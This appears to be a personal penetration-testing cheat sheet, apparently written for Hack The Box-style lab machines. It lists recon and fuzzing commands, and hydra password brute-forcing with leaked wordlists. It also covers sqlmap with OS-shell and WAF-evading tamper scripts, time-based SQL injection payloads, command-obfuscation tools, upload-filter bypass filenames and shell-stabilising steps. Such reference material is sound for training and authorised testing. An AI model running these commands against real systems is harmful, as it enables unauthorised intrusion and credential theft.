Following tools is used in single machine exploitation. Active Directory may be in another blog.
Using multiple threads should be added after since in some cases, it's not allowed to send too many requests at the same time.
nmap -p- -v -sC -sV -O {{ip_address}}
// Additional tags
--packet-trace Shows all packets sent and received
-sU Performs a UDP scan.
-sT Performs a Full TCP scan.
-n Disables DNS resolution.
--disable-arp-ping Disables ARP ping.
-Pn Disables ICMP Echo requests.
--reason Displays the reason a port is in a particular state.
-D Cloak a scan with decoys.
nmap -n -sP 10.129.181.82/24
feroxbuster -u {{url}} -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,asp -t 200
ffuf -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://94.237.60.55:43757/FUZZ -fc 404
nslookup
host
dnsenum (took a long time)
dnsrecon
nuclei -u {{url}}
Bruteforce:
gobuster dns -d {{url_without_protocol}} -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --wildcard --timeout 20s
amass enum -d {{url}}}
Cache memory search:
dig axfr @{{url_without_protocol}} zonetransfer.me
gobuster vhost -u {{url}} -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain --timeout 20s
whatweb -a 4 {{url}}
nikto -h {{url}} -Tuning b
Overall:
finalrecon
Hackthebox ReconSpider:
wget -O ReconSpider.zip https://academy.hackthebox.com/storage/modules/144/ReconSpider.v1.2.zip
unzip ReconSpider.zip
python3 ReconSpider.py http://inlanefreight.com
whois -> revealing info of individual mananging server (social engineering)
nslookup
entropt@htb[/htb]$ searchsploit openssh 7.2
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
OpenSSH 7.2 - Denial of Service | linux/dos/40888.py
OpenSSH 7.2p1 - (Authenticated) xauth Command Injection | multiple/remote/39569.py
OpenSSH 7.2p2 - Username Enumeration | linux/remote/40136.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
OpenSSHd 7.2p2 - Username Enumeration | linux/remote/40113.txt
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Step 1: Check valid characters Step 2: Craft a suitable command through found characters
Advice: Don't use command related to users (e.g whoami, id,...) in testing RCE since a few web application don't have user manag1ing.
// Bashfuscator Installation
git clone https://github.com/Bashfuscator/Bashfuscator
cd Bashfuscator
pip3 install setuptools==65
python3 setup.py install --user
cd ./bashfuscator/bin/
./bashfuscator -h
usage: bashfuscator [-h] [-l] ...SNIP...
optional arguments:
-h, --help show this help message and exit
Program Options:
-l, --list List all the available obfuscators, compressors, and encoders
-c COMMAND, --command COMMAND
Command to obfuscate
...SNIP...
PS> git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
PS> cd Invoke-DOSfuscation
PS> Import-Module .\Invoke-DOSfuscation.psd1
PS> Invoke-DOSfuscation
Invoke-DOSfuscation> help
HELP MENU :: Available options shown below:
[*] Tutorial of how to use this tool TUTORIAL
...SNIP...
Choose one of the below options:
[*] BINARY Obfuscated binary syntax for cmd.exe & powershell.exe
[*] ENCODING Environment variable encoding
[*] PAYLOAD Obfuscated payload via DOSfuscation
...SNIP...
burpsuite
// Personalized wordlist
cupp -i
sed -ri '/^.{,7}$/d' william.txt # remove shorter than 8
sed -ri '/[!-/:-@\[-`\{-~]+/!d' william.txt # remove no special chars
sed -ri '/[0-9]+/!d' william.txt # remove no numbers
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt {{ip_address}} -s {{port}} -u -f http-get /
hydra -L /usr/share/seclists/Usernames/Names/names.txt -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -u -f {{ip_address}} -s {{port}} http-get /
hydra -L admin -P password -u -f service://[ip_address][:PORT][/OPT]
// Format: hydra <Username/List> <Password/List> <IP> <Method> "<Path>:<RequestBody>:<IncorrectVerbiage>"
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt {{ip_address}} -s {{port}} -u -f http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
ffuf -w /usr/share/wordlists/rockyou.txt:FUZZ -X 'POST' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=FUZZ' -u {{url}}
ffuf or hydra can be used as a bruteforce tool in case of large amount of payloads or burpsuite being banned.
sqlmap -u {{url}} --level=5 --risk=3
// Usefull tag
--random-agent
--os-shell
--delay
# All scripts
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
# General scripts
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
# Microsoft access
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
# Microsoft SQL Server
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
# MySQL
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
# Oracle
--tamper=between,charencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes,xforwardedfor
# PostgreSQL
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,xforwardedfor
# SAP MaxDB
--tamper=ifnull2ifisnull,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,unionalltounion,unmagicquotes,xforwardedfor
# SQLite
--tamper=ifnull2ifisnull,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2dash,space2plus,unionalltounion,unmagicquotes,xforwardedfor
// Test both AND and OR in value SQL by timebased to see which works
...SNIP... AND SLEEP(5)
...SNIP... OR SLEEP(5)
// Change char and ext for your purpose
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
for ext in '.php' '.phps'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done
wpscan
// Python
python3 -c 'import pty; pty.spawn("/bin/bash")'
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; reset;
// Typescript
script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; reset;
// check both shell and non-shell users
cat /etc/passwd
netstat -antp | grep -i list